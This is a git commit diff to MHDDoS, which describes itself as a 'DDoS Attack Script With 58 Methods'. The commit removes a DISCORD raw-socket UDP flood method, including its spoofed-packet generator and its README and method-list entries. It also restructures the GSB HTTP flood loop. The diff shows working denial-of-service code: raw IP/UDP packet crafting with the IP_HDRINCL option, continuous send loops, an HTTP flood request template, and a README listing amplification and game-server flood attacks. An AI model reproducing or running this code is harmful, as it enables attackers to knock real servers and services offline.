discord method removed

This commit is contained in:
CirqueiraDev 2025-10-22 16:48:25 -03:00
parent b09c193ff0
commit da88a2fd7a
2 changed files with 6 additions and 28 deletions

View File

@ -1,4 +1,4 @@
<h1 align="center">MHDDoS - DDoS Attack Script With 58 Methods</h1>
<h1 align="center">MHDDoS - DDoS Attack Script With 57 Methods</h1>
<em><h5 align="center">(Programming Language - Python 3)</h5></em>
<p align="center">
@ -57,7 +57,6 @@
* <img src="https://mycrackfree.com/wp-content/uploads/2018/08/TeamSpeak-Server-9.png" width="16" height="16" alt="teamspeak 3"> TS3 | Send Teamspeak 3 Status Ping Protocol
* <img src="https://cdn2.downdetector.com/static/uploads/logo/75ef9fcabc1abea8fce0ebd0236a4132710fcb2e.png" width="16" height="16" alt="fivem"> FIVEM | Send FiveM Status Ping Protocol
* <img src="https://github.com/user-attachments/assets/f40748bf-dd28-4294-b862-cb0acbc74eea" width="16" height="16" alt="fivem-token"> FIVEM-TOKEN | Send FiveM confirmation token flood
* <img src="https://cdn.prod.website-files.com/6257adef93867e50d84d30e2/678a4c12dbf6be5d792aa920_Clyde%20Cube.webp" width="16" height="16" alt="udp"> DISCORD | Send RAW packet flood with custom payload
* <img src="https://cdn.iconscout.com/icon/free/png-512/redis-4-1175103.png" width="16" height="16" alt="mem"> MEM | Memcached Amplification
* <img src="https://lyrahosting.com/wp-content/uploads/2020/06/ddos-attack-icon.png" width="16" height="16" alt="ntp"> NTP | NTP Amplification
* <img src="https://cdn-icons-png.flaticon.com/512/4712/4712139.png" width="16" height="16" alt="mcbot"> MCBOT | Minecraft Bot Attack

View File

@ -128,7 +128,7 @@ class Methods:
LAYER4_METHODS: Set[str] = {*LAYER4_AMP,
"TCP", "UDP", "SYN", "VSE", "MINECRAFT",
"MCBOT", "CONNECTION", "CPS", "FIVEM", "FIVEM-TOKEN",
"TS3", "MCPE", "ICMP", "DISCORD", "OVH-UDP",
"TS3", "MCPE", "ICMP", "OVH-UDP",
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
@ -402,7 +402,6 @@ class Layer4(Thread):
"FIVEM": self.FIVEM,
"FIVEM-TOKEN": self.FIVEMTOKEN,
"OVH-UDP": self.OVHUDP,
"DISCORD": self.DISCORD,
"MINECRAFT": self.MINECRAFT,
"CPS": self.CPS,
"CONNECTION": self.CONNECTION,
@ -538,14 +537,6 @@ class Layer4(Thread):
continue
Tools.safe_close(s)
def DISCORD(self) -> None:
payload = self._generate_discord()
with socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEMTOKEN(self) -> None:
global BYTES_SEND, REQUESTS_SENT
@ -626,18 +617,6 @@ class Layer4(Thread):
return packets
def _generate_discord(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(__ip__)
ip.set_ip_dst(self._target[0])
udp: UDP = UDP()
udp.set_uh_sport(ProxyTools.Random.rand_int(32768, 65535))
udp.set_uh_dport(self._target[1])
payload_data = bytes([ProxyTools.Random.rand_int(0, 255) for _ in range(40)])
udp.contains(Data(payload_data))
ip.contains(udp)
return ip.get_packet()
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(__ip__)
@ -1174,7 +1153,10 @@ class HttpFlood(Thread):
Tools.safe_close(s)
def GSB(self):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
@ -1190,9 +1172,6 @@ class HttpFlood(Thread):
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)